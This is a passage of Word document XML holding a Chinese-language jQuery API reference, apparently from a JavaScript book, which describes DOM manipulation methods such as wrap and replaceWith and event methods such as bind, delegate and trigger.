        <w:t>remove([sel])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从文档中移除所有选中元素或所有匹配</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>的选中元素，同时移除所有与它们相关的数据（包括事件</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序）。注意，移除的元素将不再是文档的一部分，但还是返回的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的成员。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>replaceAll(target)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将选中元素插入到文档中并替换每一个</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>元素，如果有多个目标，必要时将复制选中元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>replaceWith(content)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>replaceWith(f(idx,html):content)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:t>替换每个选中元素，或将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为每个选中元素的方法调用，传入元素的索引及当前</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>内容，然后用返回值替换对应元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>text():string</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>text(plainText)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>text(f(idx,current):plainText)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果不带参数，则以纯文本字符串的形式返回第一个选中元素的内容。如果传入一个参数，则将所有选中元素的内容设置为指定的</w:t>
      </w:r>
      <w:r>
        <w:t>plainText</w:t>
      </w:r>
      <w:r>
        <w:t>或将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为这些元素的方法调用时的返回值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unwrap()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>移除每个选中元素的父节点，将它们替换为选中元素及其兄弟元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>wrap(wrapper)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>wrap(f(idx):wrapper)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>wrapper</w:t>
      </w:r>
      <w:r>
        <w:t>将每一个选中元素包裹起来，如果有多个选中元素，必要时会复制这个包装元素。如果</w:t>
      </w:r>
      <w:r>
        <w:t>传入的是一个函数，则将它</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>作为每个选中元素的方法调用以计算出</w:t>
      </w:r>
      <w:r>
        <w:t>wrapper</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>wrapper</w:t>
      </w:r>
      <w:r>
        <w:t>可以是一个元素、一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象、一个选择器或者一段</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>字符串，但它必须只有一个最内层元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>wrapAll(wrapper)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>wrapper</w:t>
      </w:r>
      <w:r>
        <w:t>将所有选中元素作为一组包裹起来，方式为将</w:t>
      </w:r>
      <w:r>
        <w:t>wrapper</w:t>
      </w:r>
      <w:r>
        <w:t>插入到第一个选中元素的位置，然后把所有选中元素复制到</w:t>
      </w:r>
      <w:r>
        <w:t>wrapper</w:t>
      </w:r>
      <w:r>
        <w:t>的最内层元素中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>wrapInner(wrapper)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>wrapInner(f(idx):wrapper)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>wrap()</w:t>
      </w:r>
      <w:r>
        <w:t>，但它使用</w:t>
      </w:r>
      <w:r>
        <w:t>wrapper</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值）将每一个选中元素的内容包裹起来，而不是把元素自身包裹起来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本节的方法用于注册事件处理程序以及触发事件。参见</w:t>
      </w:r>
      <w:r>
        <w:t>19.4</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>event-type()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>event-type(f(event))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>注册为</w:t>
      </w:r>
      <w:r>
        <w:t>event-type</w:t>
      </w:r>
      <w:r>
        <w:t>的处理程序，或触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>event-type</w:t>
      </w:r>
      <w:r>
        <w:t>类型的事件。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>定义了下面这些使用这个模式的便捷方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251774976" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3295290" cy="759124"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="119" name="00119.jpeg" descr="00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19.jpeg" descr="00119.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId122"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3295290" cy="759124"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>bind(type,[data],f(event))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>bind(events)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在每个选中元素上将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>注册为指定</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>的事件的处理程序。如果指定了</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>，则在调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>之前先将它添加到事件对象上。</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>可能定义了多种事件类型，也可能包含命名空间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果传入了一个单独的对象，则将它视为一个事件类型到处理程序函数的映射，并在每个选中元素上为所有指定的事件注册处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>delegate(sel,type,[data],f(event))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>注册为一个实时事件处理程序。当类型为</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>的事件在匹配</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>的某个元素上发生并冒泡到任意一个选中元素上时触发</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>。如果指定了</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>，将在调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>之前把</w:t>
      </w:r>
      <w:r>
        <w:t>它添加到事件对象中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>die(type,[f(event)])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>注销由</w:t>
      </w:r>
      <w:r>
        <w:t>live()</w:t>
      </w:r>
      <w:r>
        <w:t>在当前选中元素中匹配选择器字符串的元素上注册的类型为</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>的事件的实时事件处理程序。如果指定了特定的事件处理程序函数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>，则只注销这一个。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>hover(f(event))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>hover(enter(event),leave(event))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在所有选中元素上为</w:t>
      </w:r>
      <w:r>
        <w:t>"mouseenter"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"mouseleave"</w:t>
      </w:r>
      <w:r>
        <w:t>事件注册处理程序。如果只指定了一个方法，则将它同时用做两个事件的处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>live(type,[data],f(event</w:t>
      </w:r>
      <w:r>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>注册为类型为</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>的事件的实时事件处理程序。如果指定了</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>，则在调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>之前将它添加到事件对象中。这个方法不使用选中元素的集合，但它的确要用到选择器字符串以及当前</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>context</w:t>
      </w:r>
      <w:r>
        <w:t>对象。当类型为</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>的事件冒泡到</w:t>
      </w:r>
      <w:r>
        <w:t>context</w:t>
      </w:r>
      <w:r>
        <w:t>对象（通常为</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>）并且事件的目标元素匹配选择器时，将触发</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>。参见</w:t>
      </w:r>
      <w:r>
        <w:t>delegate()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>one(type,[data],f(event))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>one(events)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>，不同之处是注册的事件处理程序将在执行一次之后自动注销。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>rea</w:t>
      </w:r>
      <w:r>
        <w:t>dy(f())</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注册</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>为当文档就绪时调用，或者如果文档已经就绪则立刻调用它。这个方法用不到选中的元素，它和</w:t>
      </w:r>
      <w:r>
        <w:t>$(f)</w:t>
      </w:r>
      <w:r>
        <w:t>同义。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toggle(f1(event),f2(event),...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在所有选中元素上注册一个</w:t>
      </w:r>
      <w:r>
        <w:t>"click"</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序，这个处理程序会在指定的处理程序函数中改变（或切换）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>trigger(type,[params])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>trigger(event)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在所有选中元素上触发一个类型为</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>的事件，并将</w:t>
      </w:r>
      <w:r>
        <w:t>params</w:t>
      </w:r>
      <w:r>
        <w:t>作为一个额外的参数传给事件处理程序。</w:t>
      </w:r>
      <w:r>
        <w:t>params</w:t>
      </w:r>
      <w:r>
        <w:t>可以省略，可以是一个单独的值，也可</w:t>
      </w:r>
      <w:r>
        <w:t>以是一个值数组。如果传入一个</w:t>
      </w:r>
      <w:r>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:t>对象，则它的</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性将指定事件的类型，其余属性将复制到将传入处理程序的事件对象中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>triggerHandler(type,[params])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>trigger()</w:t>
      </w:r>
      <w:r>
        <w:t>，但不允许触发的事件冒泡或触发浏览器的默认行为。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unbind([type],[f(event)])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果不带参数，则在所有选中元素上注销全部</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序。如果传入一个参数，则在所有选中元素上注销类型为</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>的事件的事件处理程序。如果传入两个参数，则在所有选中元素上类型作为</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>事件的处理程序注销</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>可以指定多个事件类型，也可以包含命名空间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>undelegate()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>undelegate(sel,type,[f(event)])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果不带参数，则注销选中元素委派的所有实时事件处理程序。如果传入两个参数，则注销所有选中元素中匹配</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>的元素委派的类型为</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>的实时事件处理程序。如果</w:t>
      </w:r>
      <w:r>
        <w:t>传入三个参数，则只注销处理程序</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>特效及动画方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这儿描述的方法提供了视觉特效和自定义动画。它们大多数都返回调用自己的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象。参见</w:t>
      </w:r>
      <w:r>
        <w:t>19.5</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
